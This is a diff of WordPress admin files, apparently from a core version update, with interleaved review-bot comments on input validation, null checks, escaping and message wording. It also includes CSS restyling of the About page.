 	<dt><a href="https://planet.wordpress.org/">WordPress Planet</a></dt>
75 75
 		<dd>The WordPress Planet is a news aggregator that brings together posts from WordPress blogs around the web.</dd>
76 76
 	<dt><a href="https://wordpress.org/support/forums/">WordPress Support Forums</a></dt>
77
-		<dd>If you&#8217;ve looked everywhere and still can&#8217;t find an answer, the support forums are very active and have a large community ready to help. To help them help you be sure to use a descriptive thread title and describe your question in as much detail as possible.</dd>
77
+		<dd>If you&#8217;ve looked everywhere and still cannot find an answer, the support forums are very active and have a large community ready to help. To help them help you be sure to use a descriptive thread title and describe your question in as much detail as possible.</dd>
78 78
 	<dt><a href="https://make.wordpress.org/support/handbook/appendix/other-support-locations/introduction-to-irc/">WordPress <abbr>IRC</abbr> (Internet Relay Chat) Channel</a></dt>
79 79
 		<dd>There is an online chat channel that is used for discussion among people who use WordPress and occasionally support topics. The above wiki page should point you in the right direction. (<a href="https://web.libera.chat/#wordpress">irc.libera.chat #wordpress</a>)</dd>
80 80
 </dl>

File diff suppressed because it is too large
+ 177 - 156
app/wp-admin/about.php


+ 4 - 3
app/wp-admin/admin-ajax.php

@@ -27,8 +27,8 @@ send_origin_headers();
27 27
 header( 'Content-Type: text/html; charset=' . get_option( 'blog_charset' ) );
28 28
 header( 'X-Robots-Tag: noindex' );
29 29
 
30
-// Require an action parameter.
31
-if ( empty( $_REQUEST['action'] ) ) {
30
+// Require a valid action parameter.
31
+if ( empty( $_REQUEST['action'] ) || ! is_scalar( $_REQUEST['action'] ) ) {
32 32
 	wp_die( '0', 400 );
33 33
 }
34 34
 
@@ -168,7 +168,7 @@ add_action( 'wp_ajax_nopriv_generate-password', 'wp_ajax_nopriv_generate_passwor
168 168
 
169 169
 add_action( 'wp_ajax_nopriv_heartbeat', 'wp_ajax_nopriv_heartbeat', 1 );
170 170
 
171
-$action = ( isset( $_REQUEST['action'] ) ) ? $_REQUEST['action'] : '';
171
+$action = $_REQUEST['action'];
172 172
 
173 173
 if ( is_user_logged_in() ) {
174 174
 	// If no action is registered, return a Bad Request response.
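Review bot: new line 171 reads `$_REQUEST['action']` with no `isset()` fallback, so it is only safe because of the `empty()` / `is_scalar()` guard added at line 31, roughly 140 lines earlier. Add a short comment here pointing at that guard, or keep the defensive ternary, so that a later refactor of the early `wp_die( '0', 400 )` cannot reintroduce an undefined-index notice or let an array reach the `"wp_ajax_nopriv_{$action}"` hook name. It is also worth considering `is_string()` instead of `is_scalar()`, which additionally admits booleans and numbers.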
@@ -201,5 +201,6 @@ if ( is_user_logged_in() ) {
201 201
 	 */
202 202
 	do_action( "wp_ajax_nopriv_{$action}" );
203 203
 }
204
+
204 205
 // Default status.
205 206
 wp_die( '0' );

+ 21 - 5
app/wp-admin/admin-header.php

@@ -18,13 +18,14 @@ if ( ! defined( 'WP_ADMIN' ) ) {
18 18
  * @global string    $hook_suffix
19 19
  * @global WP_Screen $current_screen     WordPress current screen object.
20 20
  * @global WP_Locale $wp_locale          WordPress date and time locale object.
21
- * @global string    $pagenow
21
+ * @global string    $pagenow            The filename of the current screen.
22 22
  * @global string    $update_title
23 23
  * @global int       $total_update_count
24 24
  * @global string    $parent_file
25
+ * @global string    $typenow            The post type of the current screen.
25 26
  */
26 27
 global $title, $hook_suffix, $current_screen, $wp_locale, $pagenow,
27
-	$update_title, $total_update_count, $parent_file;
28
+	$update_title, $total_update_count, $parent_file, $typenow;
28 29
 
29 30
 // Catch plugins that include admin-header.php before admin.php completes.
30 31
 if ( empty( $current_screen ) ) {
@@ -48,8 +49,23 @@ if ( $admin_title === $title ) {
48 49
 	/* translators: Admin screen title. %s: Admin screen name. */
49 50
 	$admin_title = sprintf( __( '%s &#8212; WordPress' ), $title );
50 51
 } else {
52
+	$screen_title = $title;
53
+
54
+	if ( 'post' === $current_screen->base && 'add' !== $current_screen->action ) {
55
+		$post_title = get_the_title();
56
+		if ( ! empty( $post_title ) ) {
57
+			$post_type_obj = get_post_type_object( $typenow );
58
+			$screen_title  = sprintf(
59
+				/* translators: Editor admin screen title. 1: "Edit item" text for the post type, 2: Post title. */
60
+				__( '%1$s &#8220;%2$s&#8221;' ),
61
+				$post_type_obj->labels->edit_item,
62
+				$post_title
63
+			);
64
+		}
65
+	}
66
+
51 67
 	/* translators: Admin screen title. 1: Admin screen name, 2: Network or site name. */
52
-	$admin_title = sprintf( __( '%1$s &lsaquo; %2$s &#8212; WordPress' ), $title, $admin_title );
68
+	$admin_title = sprintf( __( '%1$s &lsaquo; %2$s &#8212; WordPress' ), $screen_title, $admin_title );
53 69
 }
54 70
 
55 71
 if ( wp_is_recovery_mode() ) {
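Review bot: `get_post_type_object( $typenow )` on new line 57 returns null when `$typenow` is empty or names an unregistered post type, and line 61 then dereferences `$post_type_obj->labels->edit_item` unconditionally. Guard the `sprintf()` with `if ( $post_type_obj )` and fall back to `$title` otherwise. The value from `get_the_title()` also now flows into `$admin_title`; please confirm it is escaped where the title tag is printed, which is outside this hunk.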
@@ -81,7 +97,7 @@ wp_enqueue_script( 'svg-painter' );
81 97
 $admin_body_class = preg_replace( '/[^a-z0-9_-]+/i', '-', $hook_suffix );
82 98
 ?>
83 99
 <script type="text/javascript">
84
-addLoadEvent = function(func){if(typeof jQuery!=='undefined')jQuery(document).ready(func);else if(typeof wpOnload!=='function'){wpOnload=func;}else{var oldonload=wpOnload;wpOnload=function(){oldonload();func();}}};
100
+addLoadEvent = function(func){if(typeof jQuery!=='undefined')jQuery(function(){func();});else if(typeof wpOnload!=='function'){wpOnload=func;}else{var oldonload=wpOnload;wpOnload=function(){oldonload();func();}}};
85 101
 var ajaxurl = '<?php echo esc_js( admin_url( 'admin-ajax.php', 'relative' ) ); ?>',
86 102
 	pagenow = '<?php echo esc_js( $current_screen->id ); ?>',
87 103
 	typenow = '<?php echo esc_js( $current_screen->post_type ); ?>',
@@ -132,7 +148,7 @@ do_action( 'admin_print_scripts' );
132 148
 /**
133 149
  * Fires in head section for a specific admin page.
134 150
  *
135
- * The dynamic portion of the hook, `$hook_suffix`, refers to the hook suffix
151
+ * The dynamic portion of the hook name, `$hook_suffix`, refers to the hook suffix
136 152
  * for the admin page.
137 153
  *
138 154
  * @since 2.1.0

+ 16 - 1
app/wp-admin/admin-post.php

@@ -29,7 +29,12 @@ nocache_headers();
29 29
 /** This action is documented in wp-admin/admin.php */
30 30
 do_action( 'admin_init' );
31 31
 
32
-$action = empty( $_REQUEST['action'] ) ? '' : $_REQUEST['action'];
32
+$action = ! empty( $_REQUEST['action'] ) ? $_REQUEST['action'] : '';
33
+
34
+// Reject invalid parameters.
35
+if ( ! is_scalar( $action ) ) {
36
+	wp_die( '', 400 );
37
+}
33 38
 
34 39
 if ( ! is_user_logged_in() ) {
35 40
 	if ( empty( $action ) ) {
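Review bot: the `is_scalar( $action )` rejection at new line 35 runs after `do_action( 'admin_init' )` on line 30, so every `admin_init` callback still sees the raw array in `$_REQUEST['action']` before the request is refused. Consider moving the check above the hook, or document that callbacks must not trust the parameter at that point. The empty body in `wp_die( '', 400 )` also differs from the `'0'` that admin-ajax.php returns for the same condition; a one-line comment explaining the difference would help.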
@@ -40,6 +45,11 @@ if ( ! is_user_logged_in() ) {
40 45
 		 */
41 46
 		do_action( 'admin_post_nopriv' );
42 47
 	} else {
48
+		// If no action is registered, return a Bad Request response.
49
+		if ( ! has_action( "admin_post_nopriv_{$action}" ) ) {
50
+			wp_die( '', 400 );
51
+		}
52
+
43 53
 		/**
44 54
 		 * Fires on a non-authenticated admin post request for the given action.
45 55
 		 *
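Review bot: the `has_action( "admin_post_nopriv_{$action}" )` guard at new lines 48-51 changes observable behaviour and that is not documented anywhere in the hunk. A request naming an unregistered action previously fell through to a `do_action()` call with no callbacks, and now receives a 400 with an empty body. The tightening is reasonable, but it deserves a changelog or docblock mention, and a non-empty message in `wp_die()` would give integrators something to debug with.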
@@ -59,6 +69,11 @@ if ( ! is_user_logged_in() ) {
59 69
 		 */
60 70
 		do_action( 'admin_post' );
61 71
 	} else {
72
+		// If no action is registered, return a Bad Request response.
73
+		if ( ! has_action( "admin_post_{$action}" ) ) {
74
+			wp_die( '', 400 );
75
+		}
76
+
62 77
 		/**
63 78
 		 * Fires on an authenticated admin post request for the given action.
64 79
 		 *
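Review bot: new lines 72-75 repeat the guard from lines 48-51 verbatim apart from the hook prefix. Building the hook name once and calling `has_action()` in a single place would keep the authenticated and unauthenticated branches from drifting apart if the response code or message is changed later.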

+ 19 - 8
app/wp-admin/admin.php

@@ -116,16 +116,16 @@ $time_format = __( 'g:i a' );
116 116
 wp_enqueue_script( 'common' );
117 117
 
118 118
 /**
119
- * $pagenow is set in vars.php
120
- * $wp_importers is sometimes set in wp-admin/includes/import.php
121
- * The remaining variables are imported as globals elsewhere, declared as globals here
119
+ * $pagenow is set in vars.php.
120
+ * $wp_importers is sometimes set in wp-admin/includes/import.php.
121
+ * The remaining variables are imported as globals elsewhere, declared as globals here.
122 122
  *
123
- * @global string $pagenow
123
+ * @global string $pagenow      The filename of the current screen.
124 124
  * @global array  $wp_importers
125 125
  * @global string $hook_suffix
126 126
  * @global string $plugin_page
127
- * @global string $typenow
128
- * @global string $taxnow
127
+ * @global string $typenow      The post type of the current screen.
128
+ * @global string $taxnow       The taxonomy of the current screen.
129 129
  */
130 130
 global $pagenow, $wp_importers, $hook_suffix, $plugin_page, $typenow, $taxnow;
131 131
 
@@ -320,13 +320,24 @@ if ( isset( $plugin_page ) ) {
320 320
 	 *
321 321
 	 * The dynamic portion of the hook name, `$importer`, refers to the importer slug.
322 322
 	 *
323
+	 * Possible hook names include:
324
+	 *
325
+	 *  - `load-importer-blogger`
326
+	 *  - `load-importer-wpcat2tag`
327
+	 *  - `load-importer-livejournal`
328
+	 *  - `load-importer-mt`
329
+	 *  - `load-importer-rss`
330
+	 *  - `load-importer-tumblr`
331
+	 *  - `load-importer-wordpress`
332
+	 *
323 333
 	 * @since 3.5.0
324 334
 	 */
325 335
 	do_action( "load-importer-{$importer}" ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores
326 336
 
337
+	// Used in the HTML title tag.
338
+	$title        = __( 'Import' );
327 339
 	$parent_file  = 'tools.php';
328 340
 	$submenu_file = 'import.php';
329
-	$title        = __( 'Import' );
330 341
 
331 342
 	if ( ! isset( $_GET['noheader'] ) ) {
332 343
 		require_once ABSPATH . 'wp-admin/admin-header.php';
@@ -365,7 +376,7 @@ if ( isset( $plugin_page ) ) {
365 376
 	 * The load-* hook fires in a number of contexts. This hook is for core screens.
366 377
 	 *
367 378
 	 * The dynamic portion of the hook name, `$pagenow`, is a global variable
368
-	 * referring to the filename of the current page, such as 'admin.php',
379
+	 * referring to the filename of the current screen, such as 'admin.php',
369 380
 	 * 'post-new.php' etc. A complete hook for the latter would be
370 381
 	 * 'load-post-new.php'.
371 382
 	 *

+ 1 - 1
app/wp-admin/async-upload.php

@@ -74,7 +74,7 @@ if ( isset( $_REQUEST['attachment_id'] ) && (int) $_REQUEST['attachment_id'] &&
74 74
 					</span>
75 75
 					<?php
76 76
 					if ( current_user_can( 'edit_post', $id ) ) {
77
-						echo '<a class="edit-attachment" href="' . esc_url( get_edit_post_link( $id ) ) . '" target="_blank">' . _x( 'Edit', 'media item' ) . '</a>';
77
+						echo '<a class="edit-attachment" href="' . esc_url( get_edit_post_link( $id ) ) . '">' . _x( 'Edit', 'media item' ) . '</a>';
78 78
 					} else {
79 79
 						echo '<span class="edit-attachment">' . _x( 'Success', 'media item' ) . '</span>';
80 80
 					}

+ 27 - 14
app/wp-admin/authorize-application.php

@@ -62,6 +62,7 @@ if ( isset( $_POST['action'] ) && 'authorize_application_password' === $_POST['a
62 62
 	}
63 63
 }
64 64
 
65
+// Used in the HTML title tag.
65 66
 $title = __( 'Authorize Application' );
66 67
 
67 68
 $app_name    = ! empty( $_REQUEST['app_name'] ) ? $_REQUEST['app_name'] : '';
@@ -90,7 +91,7 @@ if ( is_wp_error( $is_valid ) ) {
90 91
 
91 92
 if ( wp_is_site_protected_by_basic_auth( 'front' ) ) {
92 93
 	wp_die(
93
-		__( 'Your website appears to use Basic Authentication, which is not currently compatible with Application Passwords.' ),
94
+		__( 'Your website appears to use Basic Authentication, which is not currently compatible with application passwords.' ),
94 95
 		__( 'Cannot Authorize Application' ),
95 96
 		array(
96 97
 			'response'  => 501,
@@ -147,30 +148,42 @@ require_once ABSPATH . 'wp-admin/admin-header.php';
147 148
 				<?php
148 149
 				printf(
149 150
 					/* translators: %s: Application name. */
150
-					__( 'Would you like to give the application identifying itself as %s access to your account? You should only do this if you trust the app in question.' ),
151
+					__( 'Would you like to give the application identifying itself as %s access to your account? You should only do this if you trust the application in question.' ),
151 152
 					'<strong>' . esc_html( $app_name ) . '</strong>'
152 153
 				);
153 154
 				?>
154 155
 			</p>
155 156
 		<?php else : ?>
156
-			<p><?php _e( 'Would you like to give this application access to your account? You should only do this if you trust the app in question.' ); ?></p>
157
+			<p><?php _e( 'Would you like to give this application access to your account? You should only do this if you trust the application in question.' ); ?></p>
157 158
 		<?php endif; ?>
158 159
 
159 160
 		<?php
160 161
 		if ( is_multisite() ) {
161 162
 			$blogs       = get_blogs_of_user( $user->ID, true );
162 163
 			$blogs_count = count( $blogs );
164
+
163 165
 			if ( $blogs_count > 1 ) {
164 166
 				?>
165 167
 				<p>
166 168
 					<?php
167
-					printf(
169
+					/* translators: 1: URL to my-sites.php, 2: Number of sites the user has. */
170
+					$message = _n(
171
+						'This will grant access to <a href="%1$s">the %2$s site in this installation that you have permissions on</a>.',
172
+						'This will grant access to <a href="%1$s">all %2$s sites in this installation that you have permissions on</a>.',
173
+						$blogs_count
174
+					);
175
+
176
+					if ( is_super_admin() ) {
168 177
 						/* translators: 1: URL to my-sites.php, 2: Number of sites the user has. */
169
-						_n(
170
-							'This will grant access to <a href="%1$s">the %2$s site in this installation that you have permissions on</a>.',
171
-							'This will grant access to <a href="%1$s">all %2$s sites in this installation that you have permissions on</a>.',
178
+						$message = _n(
179
+							'This will grant access to <a href="%1$s">the %2$s site on the network as you have Super Admin rights</a>.',
180
+							'This will grant access to <a href="%1$s">all %2$s sites on the network as you have Super Admin rights</a>.',
172 181
 							$blogs_count
173
-						),
182
+						);
183
+					}
184
+
185
+					printf(
186
+						$message,
174 187
 						admin_url( 'my-sites.php' ),
175 188
 						number_format_i18n( $blogs_count )
176 189
 					);
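Review bot: the Super Admin wording added at new lines 176-183 sits inside `if ( $blogs_count > 1 )`, and `$blogs_count` is the size of `get_blogs_of_user( $user->ID, true )`, which lists the sites the user belongs to. A super admin who is a member of a single site therefore gets no notice at all, and otherwise sees their own membership count presented as "all %2$s sites on the network". Evaluate `is_super_admin()` outside the count check and either use the network's site count or drop the number from that message. Separately, `admin_url( 'my-sites.php' )` on line 187 is placed into an `href` without `esc_url()`.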
@@ -224,7 +237,7 @@ require_once ABSPATH . 'wp-admin/admin-header.php';
224 237
 
225 238
 				<div class="form-field">
226 239
 					<label for="app_name"><?php _e( 'New Application Password Name' ); ?></label>
227
-					<input type="text" id="app_name" name="app_name" value="<?php echo esc_attr( $app_name ); ?>" placeholder="<?php esc_attr_e( 'WordPress App on My Phone' ); ?>" required />
240
+					<input type="text" id="app_name" name="app_name" value="<?php echo esc_attr( $app_name ); ?>" required />
228 241
 				</div>
229 242
 
230 243
 				<?php
@@ -247,7 +260,7 @@ require_once ABSPATH . 'wp-admin/admin-header.php';
247 260
 
248 261
 				<?php
249 262
 				submit_button(
250
-					__( 'Yes, I approve of this connection.' ),
263
+					__( 'Yes, I approve of this connection' ),
251 264
 					'primary',
252 265
 					'approve',
253 266
 					false,
@@ -262,7 +275,7 @@ require_once ABSPATH . 'wp-admin/admin-header.php';
262 275
 						printf(
263 276
 							/* translators: %s: The URL the user is being redirected to. */
264 277
 							__( 'You will be sent to %s' ),
265
-							'<strong><kbd>' . esc_html(
278
+							'<strong><code>' . esc_html(
266 279
 								add_query_arg(
267 280
 									array(
268 281
 										'site_url'   => site_url(),
@@ -271,7 +284,7 @@ require_once ABSPATH . 'wp-admin/admin-header.php';
271 284
 									),
272 285
 									$success_url
273 286
 								)
274
-							) . '</kbd></strong>'
287
+							) . '</code></strong>'
275 288
 						);
276 289
 					} else {
277 290
 						_e( 'You will be given a password to manually enter into the application in question.' );
@@ -281,7 +294,7 @@ require_once ABSPATH . 'wp-admin/admin-header.php';
281 294
 
282 295
 				<?php
283 296
 				submit_button(
284
-					__( 'No, I do not approve of this connection.' ),
297
+					__( 'No, I do not approve of this connection' ),
285 298
 					'secondary',
286 299
 					'reject',
287 300
 					false,
@@ -296,7 +309,7 @@ require_once ABSPATH . 'wp-admin/admin-header.php';
296 309
 						printf(
297 310
 							/* translators: %s: The URL the user is being redirected to. */
298 311
 							__( 'You will be sent to %s' ),
299
-							'<strong><kbd>' . esc_html( $reject_url ) . '</kbd></strong>'
312
+							'<strong><code>' . esc_html( $reject_url ) . '</code></strong>'
300 313
 						);
301 314
 					} else {
302 315
 						_e( 'You will be returned to the WordPress Dashboard, and no changes will be made.' );

+ 3 - 1
app/wp-admin/comment.php

@@ -43,7 +43,7 @@ if ( isset( $_REQUEST['c'] ) ) {
43 43
 	// Prevent actions on a comment associated with a trashed post.
44 44
 	if ( $comment && 'trash' === get_post_status( $comment->comment_post_ID ) ) {
45 45
 		wp_die(
46
-			__( 'You can&#8217;t edit this comment because the associated post is in the Trash. Please restore the post first, then try again.' )
46
+			__( 'You cannot edit this comment because the associated post is in the Trash. Please restore the post first, then try again.' )
47 47
 		);
48 48
 	}
49 49
 } else {
@@ -53,6 +53,7 @@ if ( isset( $_REQUEST['c'] ) ) {
53 53
 switch ( $action ) {
54 54
 
55 55
 	case 'editcomment':
56
+		// Used in the HTML title tag.
56 57
 		$title = __( 'Edit Comment' );
57 58
 
58 59
 		get_current_screen()->add_help_tab(
@@ -96,6 +97,7 @@ switch ( $action ) {
96 97
 	case 'approve':
97 98
 	case 'trash':
98 99
 	case 'spam':
100
+		// Used in the HTML title tag.
99 101
 		$title = __( 'Moderate Comment' );
100 102
 
101 103
 		if ( ! $comment ) {

+ 8 - 1
app/wp-admin/credits.php

@@ -10,6 +10,7 @@
10 10
 require_once __DIR__ . '/admin.php';
11 11
 require_once __DIR__ . '/includes/credits.php';
12 12
 
13
+// Used in the HTML title tag.
13 14
 $title = __( 'Credits' );
14 15
 
15 16
 list( $display_version ) = explode( '-', get_bloginfo( 'version' ) );
@@ -28,7 +29,13 @@ $credits = wp_credits();
28 29
 		</div>
29 30
 
30 31
 		<div class="about__header-text">
31
-			<?php _e( 'WordPress 5.8 was created by a worldwide team of passionate individuals' ); ?>
32
+			<?php
33
+			printf(
34
+				/* translators: %s: Version number. */
35
+				__( 'WordPress %s was created by a worldwide team of passionate individuals' ),
36
+				$display_version
37
+			);
38
+			?>
32 39
 		</div>
33 40
 
34 41
 		<nav class="about__header-navigation nav-tab-wrapper wp-clearfix" aria-label="<?php esc_attr_e( 'Secondary menu' ); ?>">
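Review bot: `$display_version` is passed to `printf()` at new line 36 without escaping. It derives from `get_bloginfo( 'version' )`, so the risk is low, but wrapping it in `esc_html()` keeps output escaping late and consistent with the `esc_html( $app_name )` pattern used in authorize-application.php in this same commit.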

+ 152 - 91
app/wp-admin/css/about-rtl.css

@@ -22,7 +22,7 @@
22 22
 .about__container {
23 23
 	/* Section backgrounds */
24 24
 	--background: transparent;
25
-	--subtle-background: #def;
25
+	--subtle-background: #f0f0f0;
26 26
 
27 27
 	/* Main text color */
28 28
 	--text: #000;
@@ -30,7 +30,7 @@
30 30
 
31 31
 	/* Accent colors: used in header, on special classes. */
32 32
 	--accent-1: #3858e9; /* Accent background, link color */
33
-	--accent-2: #2d46ba; /* Header background */
33
+	--accent-2: #3858e9; /* Header background */
34 34
 
35 35
 	/* Navigation colors. */
36 36
 	--nav-background: #fff;
@@ -49,14 +49,14 @@
49 49
 .credits-php,
50 50
 .freedoms-php,
51 51
 .privacy-php {
52
-	background: #f0f7ff;
52
+	background: #fff;
53 53
 }
54 54
 
55 55
 .about-php #wpcontent,
56 56
 .credits-php #wpcontent,
57 57
 .freedoms-php #wpcontent,
58 58
 .privacy-php #wpcontent {
59
-	background: linear-gradient(-180deg, #fff 50%, #f0f7ff 100%);
59
+	background: #fff;
60 60
 	padding: 0 24px;
61 61
 }
62 62
 
@@ -141,25 +141,19 @@
141 141
 	margin: 0 0 var(--gap);
142 142
 }
143 143
 
144
-.about__section .column {
144
+.about__section .column:not(.is-edge-to-edge) {
145 145
 	padding: var(--gap);
146 146
 }
147 147
 
148
-.about__section + .about__section .column {
149
-	padding-top: 0;
150
-}
151
-
152 148
 .about__section + .about__section .is-section-header {
153 149
 	padding-bottom: var(--gap);
154 150
 }
155 151
 
156 152
 .about__section .column[class*="background-color"],
153
+.about__section:where([class*="background-color"]) .column,
157 154
 .about__section .column.has-border {
158 155
 	padding-top: var(--gap);
159
-}
160
-
161
-.about__section .column.is-edge-to-edge {
162
-	padding: 0;
156
+	padding-bottom: var(--gap);
163 157
 }
164 158
 
165 159
 .about__section .column p:first-of-type {
@@ -215,7 +209,8 @@
215 209
 }
216 210
 
217 211
 .about__section.has-gutters {
218
-	gap: calc(var(--gap) / 2);
212
+	gap: var(--gap);
213
+	margin-bottom: calc(var(--gap) * 2);
219 214
 }
220 215
 
221 216
 .about__section.has-2-columns {
@@ -223,11 +218,11 @@
223 218
 }
224 219
 
225 220
 .about__section.has-2-columns.is-wider-right {
226
-	grid-template-columns: 1fr 2fr;
221
+	grid-template-columns: 2fr 3fr;
227 222
 }
228 223
 
229 224
 .about__section.has-2-columns.is-wider-left {
230
-	grid-template-columns: 2fr 1fr;
225
+	grid-template-columns: 3fr 2fr;
231 226
 }
232 227
 
233 228
 .about__section.has-2-columns .is-section-header {
@@ -329,13 +324,24 @@
329 324
 	.about__section.has-2-columns.is-wider-left,
330 325
 	.about__section.has-3-columns {
331 326
 		display: block;
332
-		padding-bottom: calc(var(--gap) / 2);
327
+		margin-bottom: calc(var(--gap) / 2);
328
+	}
329
+
330
+	.about__section .column:not(.is-edge-to-edge) {
331
+		padding-top: var(--gap);
332
+		padding-bottom: var(--gap);
333
+	}
334
+
335
+	.about__section.has-2-columns.has-gutters.is-wider-right,
336
+	.about__section.has-2-columns.has-gutters.is-wider-left,
337
+	.about__section.has-3-columns.has-gutters {
338
+		margin-bottom: calc(var(--gap) * 2);
333 339
 	}
334 340
 
335 341
 	.about__section.has-2-columns.has-gutters .column,
336 342
 	.about__section.has-2-columns.has-gutters .column,
337 343
 	.about__section.has-3-columns.has-gutters .column {
338
-		margin-bottom: calc(var(--gap) / 2);
344
+		margin-bottom: var(--gap);
339 345
 	}
340 346
 
341 347
 	.about__section.has-2-columns.has-gutters .column:last-child,
@@ -394,21 +400,25 @@
394 400
 @media screen and (max-width: 600px) {
395 401
 	.about__section.has-2-columns {
396 402
 		display: block;
403
+		margin-bottom: var(--gap);
404
+	}
405
+
406
+	.about__section.has-2-columns:not(.has-gutters) .column:nth-of-type(n) {
407
+		padding-top: calc(var(--gap) / 2);
397 408
 		padding-bottom: calc(var(--gap) / 2);
398 409
 	}
399 410
 
411
+	.about__section.has-2-columns.has-gutters {
412
+		margin-bottom: calc(var(--gap) * 2);
413
+	}
414
+
400 415
 	.about__section.has-2-columns.has-gutters .column {
401
-		margin-bottom: calc(var(--gap) / 2);
416
+		margin-bottom: var(--gap);
402 417
 	}
403 418
 
404 419
 	.about__section.has-2-columns.has-gutters .column:last-child {
405 420
 		margin-bottom: 0;
406 421
 	}
407
-
408
-	.about__section.has-2-columns .column:nth-of-type(n) {
409
-		padding-top: calc(var(--gap) / 2);
410
-		padding-bottom: calc(var(--gap) / 2);
411
-	}
412 422
 }
413 423
 
414 424
 @media screen and (max-width: 480px) {
@@ -452,18 +462,18 @@
452 462
 .about__container h3.is-larger-heading {
453 463
 	margin-top: 0;
454 464
 	margin-bottom: 0.5em;
455
-	font-size: 2em;
456
-	line-height: 1.2;
465
+	font-size: 2rem;
457 466
 	font-weight: 700;
467
+	line-height: 1.16;
458 468
 }
459 469
 
460 470
 .about__container h3,
461 471
 .about__container h1.is-smaller-heading,
462 472
 .about__container h2.is-smaller-heading {
463 473
 	margin-top: 0;
464
-	font-size: 1.6em;
465
-	line-height: 1.3;
466
-	font-weight: 400;
474
+	font-size: 1.625rem;
475
+	font-weight: 700;
476
+	line-height: 1.4;
467 477
 }
468 478
 
469 479
 .about__container p {
@@ -471,6 +481,13 @@
471 481
 	line-height: inherit;
472 482
 }
473 483
 
484
+.about__container p.is-subheading {
485
+	margin-top: 0;
486
+	font-size: 1.5rem;
487
+	font-weight: 300;
488
+	line-height: 160%;
489
+}
490
+
474 491
 .about__section a {
475 492
 	color: var(--accent-1);
476 493
 	text-decoration: underline;
@@ -498,6 +515,10 @@
498 515
 	margin-right: calc(var(--gap) / 2);
499 516
 }
500 517
 
518
+.about__container li {
519
+	margin-bottom: 0.75rem;
520
+}
521
+
501 522
 .about__container img {
502 523
 	margin: 0;
503 524
 	max-width: 100%;
@@ -524,50 +545,14 @@
524 545
 	margin-left: auto;
525 546
 }
526 547
 
527
-.about__container .about__image-comparison {
528
-	position: relative;
529
-	display: inline-block;
530
-	max-width: 100%;
531
-}
532
-
533
-.about__container .about__image-comparison img {
534
-	-webkit-user-select: none;
535
-	user-select: none;
536
-	width: auto;
537
-	max-width: none;
538
-	max-height: 100%;
539
-}
540
-
541
-.about__container .about__image-comparison > img {
542
-	max-width: 100%;
543
-}
544
-
545
-.about__container .about__image-comparison-resize {
546
-	position: absolute !important; /* Needed to override inline style on ResizableBox */
547
-	top: 0;
548
-	bottom: 0;
549
-	right: 0;
550
-	width: 50%;
551
-	max-width: 100%;
552
-}
553
-
554
-.about__container .about__image-comparison.no-js .about__image-comparison-resize {
555
-	overflow: hidden;
556
-	border-left: 2px solid var(--wp-admin-theme-color);
557
-}
558
-
559
-.about__container .about__image-comparison-resize .components-resizable-box__side-handle::before {
560
-	width: 4px;
561
-	left: calc(50% - 2px);
562
-	transition: none;
563
-	animation: none;
564
-	opacity: 1;
565
-}
566
-
567 548
 .about__container .about__image + h3 {
568 549
 	margin-top: 1.5em;
569 550
 }
570 551
 
552
+.about__container .column .about__image {
553
+	margin-bottom: calc(var(--gap) / 2);
554
+}
555
+
571 556
 .about__container hr {
572 557
 	margin: 0;
573 558
 	height: var(--gap);
@@ -590,7 +575,8 @@
590 575
 }
591 576
 
592 577
 .about__section {
593
-	font-size: 1.2em;
578
+	font-size: 1.125rem;
579
+	line-height: 1.55;
594 580
 }
595 581
 
596 582
 .about__section.is-feature {
@@ -612,26 +598,45 @@
612 598
 /* 1.3 - Header */
613 599
 
614 600
 .about__header {
601
+	--about-header-image-width: 521px;
602
+	--about-header-image-height: 504px;
603
+	--about-header-bg-width: var(--about-header-image-width);
604
+	--about-header-bg-height: var(--about-header-image-height);
605
+	--about-header-bg-offset-inline: calc(var(--gap) * -2);
606
+
607
+	position: relative;
615 608
 	margin-bottom: var(--gap);
616 609
 	padding-top: 0;
617
-	background-position: center;
618
-	background-repeat: no-repeat;
619
-	background-size: cover;
620
-	background-image: url('../images/about-header-about.svg');
621
-	background-color: var(--accent-2);
622
-	color: var(--text-light);
610
+	background: var(--subtle-background) url('../images/about-header-about.svg?ver=6.0') no-repeat;
611
+	background-size: var(--about-header-bg-width) var(--about-header-bg-height);
612
+	background-position: left var(--about-header-bg-offset-inline) center;
623 613
 }
624 614
 
625 615
 .credits-php .about__header {
626
-	background-image: url('../images/about-header-credits.svg');
616
+	--about-header-image-width: 477px;
617
+	--about-header-image-height: 470px;
618
+	--about-header-bg-offset-inline: calc(var(--gap) * -4);
619
+
620
+	background-image: url('../images/about-header-credits.svg?ver=6.0');
621
+	background-position: left var(--about-header-bg-offset-inline) top var(--gap);
627 622
 }
628 623
 
629 624
 .freedoms-php .about__header {
630
-	background-image: url('../images/about-header-freedoms.svg');
625
+	--about-header-image-width: 411px;
626
+	--about-header-image-height: 498px;
627
+	--about-header-bg-offset-inline: var(--gap);
628
+
629
+	background-image: url('../images/about-header-freedoms.svg?ver=6.0');
630
+	background-position: left var(--about-header-bg-offset-inline) top calc(var(--gap) * 4);
631 631
 }
632 632
 
633 633
 .privacy-php .about__header {
634
-	background-image: url('../images/about-header-privacy.svg');
634
+	--about-header-image-width: 277px;
635
+	--about-header-image-height: 361px;
636
+	--about-header-bg-offset-inline: var(--gap);
637
+
638
+	background-image: url('../images/about-header-privacy.svg?ver=6.0');
639
+	background-position: left var(--about-header-bg-offset-inline) top var(--gap);
635 640
 }
636 641
 
637 642
 .about__header-image {
@@ -639,27 +644,50 @@
639 644
 }
640 645
 
641 646
 .about__header-title {
642
-	padding: 2rem 0 0;
643
-	margin: 0 2rem;
647
+	box-sizing: border-box;
648
+	margin: 0 var(--gap) 0 0;
649
+	padding: 8rem 0 0;
650
+	padding-left: calc(var(--about-header-bg-width) + var(--about-header-bg-offset-inline) + var(--gap));
651
+}
652
+
653
+.credits-php .about__header-title,
654
+.privacy-php .about__header-title {
655
+	padding-top: 6rem;
656
+}
657
+
658
+.freedoms-php .about__header-title {
659
+	padding-top: 3rem;
644 660
 }
645 661
 
646 662
 .about__header-title h1 {
647
-	margin: 0 0 0.5rem;
663
+	margin: 0 0 1rem;
648 664
 	padding: 0;
649
-	font-size: 4.5rem;
665
+	font-size: clamp(3rem, 18.46vw - 8.08rem, 6rem);
650 666
 	line-height: 1;
651 667
 	font-weight: 400;
652 668
 }
653 669
 
654 670
 .about__header-text {
655
-	max-width: 42rem;
656
-	margin: 0 0 5em;
657
-	padding: 0 2rem;
658
-	font-size: 2rem;
671
+	box-sizing: border-box;
672
+	margin: 0 0 9rem;
673
+	padding: 0 2rem 0 0;
674
